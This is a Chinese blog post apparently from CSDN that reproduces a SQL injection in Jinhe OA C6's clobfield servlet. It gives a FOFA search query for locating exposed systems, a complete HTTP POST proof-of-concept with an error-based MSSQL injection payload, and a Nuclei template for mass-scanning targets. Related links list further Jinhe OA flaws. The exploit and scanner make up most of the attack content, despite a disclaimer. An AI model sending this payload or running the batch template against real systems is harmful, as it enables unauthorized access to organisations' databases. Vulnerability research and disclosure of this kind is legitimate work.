漏洞复现--金和OA clobfield SQL注入

最新推荐文章于 2024-05-30 21:37:26 发布
最新推荐文章于 2024-05-30 21:37:26 发布
阅读量738 收藏 10
点赞数 11
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/135089589
版权

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。该产品存在SQL注入漏洞

二:漏洞影响版本

金和OA

三:网络空间测绘查询

fofa:
app="金和网络-金和OA"
image.png

四:漏洞复现

image.png
POC:

POST /jc6/servlet/clobfield HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Content-Length: 158
Accept: */*
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded
SL-CE-SUID: 77

key=readClob&sImgname=filename&sTablename=FC_ATTACH&sKeyname=djbh&sKeyvalue=1' and 1=convert(int,(select sys.fn_sqlvarbasetostr(HashBytes('MD5','12345'))))--+

image.png
image.png

五:批量检测

id: JinHe-OA-clobfield-SQL-inject

info:
  name: JinHe-OA-clobfield-SQL-inject
  author: 芝士土拨鼠
  severity: high
  description: 金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。该产品存在SQL注入漏洞

requests:
  - raw:
      - |-
        POST /jc6/servlet/clobfield HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
        Content-Length: 158
        Accept: */*
        Accept-Encoding: gzip, deflate, br, zstd
        Content-Type: application/x-www-form-urlencoded
        SL-CE-SUID: 77

        key=readClob&sImgname=filename&sTablename=FC_ATTACH&sKeyname=djbh&sKeyvalue=1' and 1=convert(int,(select sys.fn_sqlvarbasetostr(HashBytes('MD5','12345'))))--+

    matchers-condition: and
    matchers:
      - type: binary
        part: body
        binary:
          - e5b086206e766172
      - type: status
        status:
          - 200

image.png

芝士土包鼠
关注
  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
OA GetSqlData.aspx 远程命令执行漏洞
xiaokp7的博客
09-13 766
OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。OA GetTreeDate存在SQL注入漏洞
OA C6/Control/GetSqlData.aspx/.ashx SQL 注入漏洞复现
0xSec
12-15 965
OA C6/Control/GetSqlData.aspx/.ashx接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
OA jc6 clobfield接口存在SQL注入漏洞
3tefanie丶zhou的博客
12-19 695
【一个人活着时无论怎样苦口婆心劝说都听不进去的话,等到人不在了,那些话却像印上文件的朱记,抹都抹不去。】
漏洞复现OA C6 FileDownLoad.aspx 任意文件读取漏洞
最新发布
siu~
05-30 342
OA C6 FileDownLoad.aspx接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件。系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现】​OA-viewConTemplate.action-远程命令执行漏洞
Nday_Seeker
03-21 393
OA viewConTemplate.action存在远程命令执行漏洞。攻击者可能通过精心构造的输入数据,在未经适当授权的情况下执行任意恶意代码指令。
OA任意文件读取漏洞
xiaokp7的博客
09-13 472
OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用OA系统存在任意文件读取漏洞,攻击者通过恶意构造的请求下载服务器上的任意文件,包括敏感文件、配置文件、数据库文件等。
OA 数据字典 c6
09-06
OA系统,C6数据库-数据字典,分享以供大家参考,借鉴
和软件OA浏览器设置.doc
11-17
和软件OA浏览器设置 和软件OA浏览器设置是指在IE浏览器中对OA系统的浏览器设置,以确保OA系统的正常运行。下面是和软件OA浏览器设置的详细步骤和相关知识点: 设置IE浏览器属性 和软件OA浏览器设置的第一...
OA加密狗破解组件
07-13
通过调整程序类库破解OA加密狗通过调整程序类库破解OA加密狗
漏洞复现--OASQL注入
qq_53003652的博客
10-23 512
OA协同办公管理系统C6软件(简称OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。该产品GetTreeDate.aspx存在SQL注入漏洞。sqlmap直接梭哈。
漏洞复现OA C6 UserList 存在SQL注入漏洞
https://blog.echo234.cn/
03-29 292
OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展。OA C6 UserList存在SQL注入漏洞
漏洞复现OA任意文件读取漏洞
晚风不及你
12-18 610
和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。
漏洞复现OA C6任意文件读取漏洞
失心少年
09-08 1035
OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断地更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。该OA C6系统的download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器的敏感信息。
jc6 GetAttOut SQL注入漏洞复现(含POC)
m0_50797689的博客
01-27 186
jc6 GetAttOut SQL注入漏洞复现(含POC)
OA系统漏洞记录
Aquarius_ego的博客
05-14 4808
OA系统介绍及相关漏洞(不断更新哦~)
oa jc6 ntko-upload 任意文件上传漏洞
01-16
OA JC6是一套企业办公协同软件,用于企业内部的办公流程管理与协同办公。而NTKO-Upload是OA JC6中的一个模块,用于用户在办公过程中上传文件进行共享和交流。 然而,OA JC6和NTKO-Upload存在一个任意文件上传漏洞。该漏洞可能会被恶意攻击者利用,上传恶意文件,从而对系统造成潜在的安全风险。 恶意上传的文件可能包含恶意代码、病毒或其他有害的文件,攻击者可通过这些文件获取系统权限、窃取敏感信息、篡改数据等。由于OA JC6广泛应用于企业内部,一旦该漏洞被利用,可能会对企业的信息安全带来严重威胁。 为了防止利用这个漏洞进行任意文件上传的攻击,建议用户采取以下措施: 1. 及时升级OA JC6和NTKO-Upload软件,确保软件的最新版本中修复了该漏洞。 2. 对OA JC6和NTKO-Upload进行适当的安全配置,禁用或限制用户上传的文件类型和大小,只允许上传安全可信的文件。 3. 定期进行系统漏洞扫描和安全评估,及时发现并修复可能存在的漏洞。 4. 配置防火墙和入侵检测系统,及时发现和阻止恶意上传行为。 5. 培训企业员工,提高其安全意识,警惕不明文件的上传和下载。 总之,任意文件上传漏洞OA JC6和NTKO-Upload的安全构成潜在威胁,为保护企业信息安全,必须采取相应的安全防护措施,并保持软件的更新和维护。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值